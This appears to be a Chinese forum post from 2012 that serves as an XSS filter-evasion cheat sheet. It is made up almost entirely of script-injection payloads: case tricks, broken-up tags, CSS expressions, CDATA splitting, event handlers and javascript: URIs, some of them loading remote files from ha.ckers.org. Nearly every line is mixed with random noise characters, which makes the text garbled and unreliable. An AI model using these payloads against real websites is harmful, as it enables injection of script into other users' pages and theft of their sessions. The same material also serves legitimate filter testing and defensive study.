1. 改变字符大小写" W. D0 s6 x: T B1 D
5 X* ~8 e- W) g- y: r8 m % ~3 ^5 q9 f! O& Q; S+ J/ r1 x
2 L ~7 J x$ }* E <sCript>alert(‘d’)</scRipT>
, Q0 e; @6 o/ ]$ K! t5 G0 G- j* b5 U( H
2. 利用多加一些其它字符来规避Regular Expression的检查
; |, k# F3 W2 T# ^, z: q8 ?" h( P0 {0 B6 c0 B% Z* U& `# Y
<<script>alert(‘c’)//<</script>
0 q/ A, |3 A" A! i. j. M
7 V3 v* T1 R- i+ d" e+ i5 U <SCRIPT a=">" SRC="t.js"></SCRIPT>
5 V: \0 ~& O6 L o: n3 L$ `( V5 N) E p" G+ i: x/ ~! i
<SCRIPT =">" SRC="t.js"></SCRIPT>: G( I, r) R9 F$ n/ T0 r" C
* d1 F& ?2 ?% ?+ {4 ~
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
9 S [" u" g: q' V+ @, R! c6 `& a- u
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
+ y& n2 A; C) S! b5 S! y# {# [1 Q2 k
<SCRIPT a=`>` SRC="t.js"></SCRIPT>6 T& U: D5 P( A8 |. x% g
- @1 @" ?/ G5 Z/ { s, h: k4 @. P* D0 L
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>5 I* N) w, e+ w( g6 d8 v
+ {- Q7 f* |% W/ L: Y7 p1 a- z# v
3. 以其它扩展名取代.js/ X& U/ ?) O9 O1 _ |3 v; T
9 `" v, E+ O2 Z) |
<script src="bad.jpg"></script>
- F/ d/ Y! c) a" T
' N/ X5 S+ _0 d* Z/ A3 u4. 将Javascript写在CSS档里- S# q3 L; g( T& J: B2 V, h
' O" X' i# n1 ?
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">, n3 V# `" }9 |1 E9 ?
& G. ~ M" {* E0 {
example:
/ H- b6 u& W8 Y! ]! e3 L) `% f' G0 b* [9 M1 N. _8 J1 E% k
body {3 `7 Z$ I( u% _5 t" L8 H
3 F# q( n& t- v. y; X
background-image: url(‘javascript:alert("XSS");’)4 M# A$ k, m9 X4 _; G# T" u4 C
4 l" t9 V2 R, M) M8 E }
7 z' ]0 v5 c) H- }; K3 k& V1 T i, g$ [: R* j8 F
5. 在script的tag里加入一些其它字符; n5 R9 q! X% f& `
) @( i9 S& n, A
<SCRIPT/SRC="t.js"></SCRIPT>
' G: x0 m2 L. }- n& [8 X4 l5 |" Z+ }& n1 a6 g1 k
<SCRIPT/anyword SRC="t.js"></SCRIPT>2 f! ]3 k0 ]& Z" X X- |* n' h8 H' [
4 d4 L5 }+ V3 f: A" G/ A
6. 使用tab或是new line来规避
' P- `/ a& U+ s' x; p% _& F0 o6 ^
<img src="jav ascr ipt:alert(‘XSS3′)">
- d4 }2 Q0 B8 j- O8 S5 q& m" `
0 q \0 v& ~+ s4 f3 F5 I. Z <img src="jav ascr ipt:alert(‘XSS3′)">' ^% R( c0 c* g# Z$ N
$ s2 j' Q6 I9 A! Q d <IMG SRC="jav ascript:alert(‘XSS’);">5 I& q/ D7 O. ]; q: K4 k; k
e0 g! ^/ b0 h* C- \$ o1 a -> tag9 w* i; |" z, c5 p
2 }! q7 B9 K ]' l) }4 x: i( ~ -> new line
& [8 z+ ^5 R: ] b
7 G# y9 L2 |* M9 G7. 使用"\"来规避
- M @0 {% g; i' g& @
g' M, p5 r6 K/ o, y( j4 E <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
) q: t. D& s! |# Y$ f5 ]. U; d) q z
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
D3 l2 t0 N' G8 d$ e# {# b; U1 d q2 m6 F( U. ^; q
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
/ U+ W6 n. a( X: n% U$ o
/ C& u" c Y, x$ H7 |+ W <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
h' u( G' O9 O+ n6 p" }( Q0 [5 f, M0 J
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>2 p r. H* r5 O0 I$ q1 a& ~$ L
9 j. w0 n+ F" D' t" {, d
8. 使用Hex encode来规避(也可能会把";"拿掉)
( [" Y' Q) @: R6 r% R/ B6 s1 ]+ n5 q
. x8 G: `2 I' g <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">; i$ [# ~. [* G* Q; G
: ]1 [! x" ]' I. W2 f! M+ h 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">6 R$ _1 B3 r! N1 T! q! H% M' v \
( x, x: `# x+ w( H- L <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">5 J& B0 d4 R4 g! Q2 C% W
0 h% c! H; [& Z/ ]1 t
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
1 K' r" ?) F/ G. Z% c: C8 u& x, W) e
0 x: t! v$ A; m2 R1 [9. script in HTML tag5 t4 x% V0 v1 m
4 G, a: r' i; W2 H8 q
<body onload=」alert(‘onload’)」> L$ [! A8 V7 M
1 S( @/ f: h" ~; W9 J
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
" \# x- I! u0 O( f) F
- I& u! \. E( t9 O) r' @10. 在swf里含有xss的code; h# k A# o: k
' e) d% [/ p$ D& g& m( A <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
/ D+ t- k3 Z3 c$ ~9 v7 z" }1 o+ c) P
7 E2 [; W; `3 Q11. 利用CDATA将xss的code拆开,再组合起来。4 E# S/ T7 J- B; [/ G7 a
& d0 q* w# R6 j& f$ \+ n
<XML ID=I><X><C>
, Y0 S5 L& n, P d5 ]
0 l1 I/ d+ W) t$ h! K <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
! J# o( z P. c, t) M6 a: B: ^9 O J. H# V
</C></X>
# l3 b9 Q/ \8 l2 A* J% T) m# T6 e" H! O/ @% a$ N1 C" V
</xml>) L; u8 s/ r0 p E# e4 B
( j) p0 C% i: r# }3 X' G( [$ x
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
) ~) \: s8 u$ x5 A. l: G, X, g/ s/ D# H$ j( b6 s3 ] l1 R
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
- c4 @& J0 K! A" |( k% i1 F5 n: R" n6 C; ^' Q
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
, K/ \; K! A: f5 @7 O. ^# |
) g2 e* x/ s/ L/ U. s8 D6 T, c12. 利用HTML+TIME。
/ R' z, `) U2 d( c$ O9 L, [
9 y) n; x5 X5 _% J, X. l' [ <HTML><BODY>+ ^! o4 k0 R' L. R6 H8 t
, T8 b8 y) J; ]4 Y <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
; V Y% b: p7 E4 W) J
0 y2 d$ z/ e7 d# P; \& p+ Z, E <?import namespace="t" implementation="#default#time2">% w1 ~; d$ Y1 T
- E9 u! N! S: s( i& t. v <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">) I8 E4 t, S* ^: @! M$ R p
( W2 ^, M. w3 t( q </BODY></HTML>4 Q% J/ q; u7 r4 S9 p
$ f7 R: a, k) v' q! [ S13. 透过META写入Cookie。4 Y& L5 y4 H" x
0 x% q2 D' [+ }1 J9 d1 [
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">1 Z7 m# g+ l+ _* a6 h; o+ p, w
7 ^. ^* f2 n% f' x, T5 M14. javascript in src , href , url9 d* |3 I, m" H8 v3 ~
5 P: O( H9 {' e/ Z0 \6 n } <IFRAME SRC=javascript:alert(’13′)></IFRAME>
0 J7 v7 X1 F* k9 V/ D6 ~
& |6 t* T. _9 L( G8 ^4 | <img src="javascript:alert(‘XSS3′)">
. Z% I6 |1 {2 Q* v1 C3 O1 P, b: I& i. v2 I- Z+ C: u
<IMG DYNSRC="javascript:alert(‘XSS20′)">
, L* ~9 Q# O# S/ }4 Y6 ?8 @1 h0 p. w% T# h% F. X% p
<IMG LOWSRC="javascript:alert(‘XSS21′)">- ~2 A1 O( Q; C
) k1 h0 `0 o7 {- e8 o7 ?( C <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
2 \7 ]) j6 `/ e5 y* y
t8 p2 y$ q, \! O <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
3 [9 N5 E0 n$ o0 ~2 Z+ A- G" K2 M$ b
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
* q: K* W) w& d) i
7 x' V6 ]) y" I* ~: P. R3 F <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">* e2 R' r/ E" h# E( h; P
- Z# }& M9 B/ s
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}5 _7 V: p+ v) {7 k0 t6 x
% g% D0 q; u& K( |1 _0 W1 M </STYLE><A CLASS=XSS></A>- \" q5 o' W) x: Z8 A1 E/ s
7 r* Q5 Z, o1 [. \ A( G! |) m
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>- u1 q% l1 \. |) K4 o. O/ Y1 Q
: M! u. W6 d6 ]8 I& U7 _% b |
发表于 2012-12-31 09:59:28
收藏
支持
反对